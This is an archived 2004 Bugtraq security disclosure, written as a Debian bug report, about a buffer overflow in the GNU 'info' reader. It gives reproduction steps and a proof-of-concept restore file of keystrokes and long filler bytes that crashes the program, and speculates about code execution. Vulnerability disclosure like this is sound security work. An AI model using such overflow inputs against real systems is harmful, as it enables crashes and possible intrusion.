Bugtraq mailing list archives
GNU/Linux 'info Buffer Overflow
From: Josh Martin <skizzles () gmail com>
Date: 6 Aug 2004 00:46:21 -0000
Package: info Version: 4.7-2.1 Severity: grave Tags: security Justification: user security hole -- System Information: Debian Release: 3.1 APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Kernel: Linux 2.6.7 Locale: LANG=C, LC_CTYPE=C Versions of packages info depends on: ii libc6 2.3.2.ds1-15 GNU C Library: Shared libraries an ii libncurses5 5.4-4 Shared libraries for terminal hand -- no debconf information Information: I have tested several versions (Debian stable, unstable and testing) and have found that this bug exists in all versions tested. I have included a small --restore script that can be used to leverage a simple Seg fault. This buffer overflow is very trivial to leverage as there are several bytes available (10-15+). It may be possible that arbitary system calls could be made though this hole. It is also possible to leverage this from the command line using the --restore=FILENAME flag, and need not have the program running. Although it is not running as suid, or as a daemon, in a case where info is being used as a public service, it may be a security problem. This bug seems only to be accessable where the file has xrefs available. Walkthrough: $ info info [info screen comes up] press 'g' [Goto Node:] type 'Expert Info' <enter> (OR any other way to get to a page with xrefs) press 'f' Type in 225 or more bytes and press enter. SEG FAULT! Example File: The following can be saved to a file and called as: info info --restore=info.bug to create a segmentation fault. [START info.bug] gExpert Info fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [END info.bug]
Current thread:
- GNU/Linux 'info Buffer Overflow Josh Martin (Aug 06)
- Re: GNU/Linux 'info Buffer Overflow Valdis . Kletnieks (Aug 06)
- Re: GNU/Linux 'info Buffer Overflow Niels Bakker (Aug 06)
- Re: GNU/Linux 'info Buffer Overflow Janusz A. Urbanowicz (Aug 07)
- Re: GNU/Linux 'info Buffer Overflow Roman Werpachowski (Aug 07)